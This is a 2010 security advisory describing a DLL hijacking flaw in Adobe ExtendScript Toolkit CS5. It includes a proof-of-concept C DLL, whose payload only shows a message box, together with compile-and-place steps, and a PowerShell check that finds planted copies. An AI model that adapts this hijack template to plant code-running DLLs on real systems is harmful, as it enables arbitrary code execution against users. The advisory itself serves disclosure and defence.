Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

2010-08-26T00:00:00
ID ZSL-2010-4952
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-08-26T00:00:00

Description

Title: Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4952
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility included with Adobe® Creative Suite CS5 and other Adobe applications. The ESTK is used for creating, editing, and debugging JavaScript to be used for scripting Adobe applications.

Description

Adobe ExtendScript Toolkit CS5 suffers from a DLL hijacking vulnerability that enables an attacker to execute arbitrary code locally. The vulnerable file extension is .jsx: opening a .jsx file causes the application to load the dwmapi.dll library from the file's own directory.
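A defender-side check for the pattern this advisory describes, added here as an example (it is not part of the advisory or of the PoC): it hunts user document folders for a dwmapi.dll lying next to .jsx files, reports its Authenticode status, and reads the CWDIllegalInDllSearch registry value that Microsoft update KB2264107 introduced to keep the current directory out of the DLL search path. The folder list in $SearchRoots is an assumption; adjust it for the environment.

```powershell
# Added example, not part of the ZSL-2010-4952 advisory or its PoC.
# A dwmapi.dll in a document folder is never legitimate: Windows XP does
# not ship it at all (which is why the search falls through to the .jsx
# file's directory), and on Vista and later it lives in System32.
# Assumption: $SearchRoots covers the folders where users open .jsx files.
$SearchRoots = @("$env:USERPROFILE\Desktop",
                 "$env:USERPROFILE\Downloads",
                 "$env:USERPROFILE\Documents")

function Find-PlantedDwmapi {
    param([string[]]$Roots, [string]$DllName = 'dwmapi.dll', [string]$DocExt = '.jsx')
    foreach ($root in $Roots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        Get-ChildItem -LiteralPath $root -Recurse -File -Filter $DllName -ErrorAction SilentlyContinue |
        ForEach-Object {
            # .jsx files in the same directory complete the hijack pattern
            $docs = @(Get-ChildItem -LiteralPath $_.DirectoryName -File -Filter "*$DocExt" -ErrorAction SilentlyContinue)
            $sig  = Get-AuthenticodeSignature -FilePath $_.FullName
            [pscustomobject]@{
                DllPath     = $_.FullName
                SizeBytes   = $_.Length
                SigStatus   = $sig.Status          # the genuine library is Microsoft-signed
                Signer      = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(unsigned)' }
                JsxNextToIt = $docs.Count
            }
        }
    }
}

function Get-CwdDllSearchPolicy {
    # KB2264107: 0xFFFFFFFF removes the current directory from the DLL search
    # path for every process; 2 removes it only for remote (UNC/WebDAV) paths.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager'
    $v = (Get-ItemProperty -Path $key -Name CWDIllegalInDllSearch -ErrorAction SilentlyContinue).CWDIllegalInDllSearch
    if ($null -eq $v) { return 'not configured (current directory is searched for DLLs)' }
    return ('0x{0:X8}' -f $v)   # REG_DWORD comes back as Int32, so -1 prints as 0xFFFFFFFF
}

Find-PlantedDwmapi -Roots $SearchRoots | Format-Table -AutoSize
"CWDIllegalInDllSearch: $(Get-CwdDllSearchPolicy)"
```

Any hit is worth a closer look; a copy that is unsigned or sits beside .jsx files is the exact artefact the PoC below produces.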

Vendor

Adobe Systems Inc. - <http://www.adobe.com>

Affected Version

CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

adobeest_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/exploits/14785>
[2] <http://packetstormsecurity.org/filedesc/adobeest_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8780>
[4] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[5] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[6] <http://www.vupen.com/english/advisories/2010/2213>
[7] <http://osvdb.org/show/osvdb/67550>
[8] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-3155>
[9] <http://www.securityfocus.com/bid/42749>

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4] and [5]
[28.08.2010] - Added reference [6] and [7]
[31.08.2010] - Added reference [8]
[13.11.2010] - Added reference [9]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
/*

 Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

 Vendor: Adobe Systems Inc.
 Product Web Page: http://www.adobe.com
 Affected Version: CS5 v3.5.0.52 ExtendScript 4.1.23 ScriptUI 5.1.37

 Summary: The ExtendScript Toolkit (ESTK) 3.5.0 is a scripting utility
 included with Adobe® Creative Suite CS5 and other Adobe applications.
 The ESTK is used for creating, editing, and debugging JavaScript to be
 used for scripting Adobe applications.

 Desc: Adobe ExtendScript Toolkit CS5 suffers from a DLL hijacking vulnerability
 that enables an attacker to execute arbitrary code locally. The vulnerable
 file extension is .jsx; the hijacked library is dwmapi.dll.

 ----
 gcc -shared -o dwmapi.dll adobeest.c

 Compile and rename to dwmapi.dll, create a file test.jsx, put both files
 in the same directory and open the .jsx file.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include <windows.h>

/* Forward declaration: the original called dll_mll() before declaring it. */
static void dll_mll(void);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
			/* Runs once when the host process maps this DLL, i.e. when
			   ESTK resolves dwmapi.dll from the directory of the .jsx file. */
			dll_mll();
			break;
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
			break;
	}

	return TRUE;
}

/* Payload of the proof of concept: only shows a message box. */
static void dll_mll(void)
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}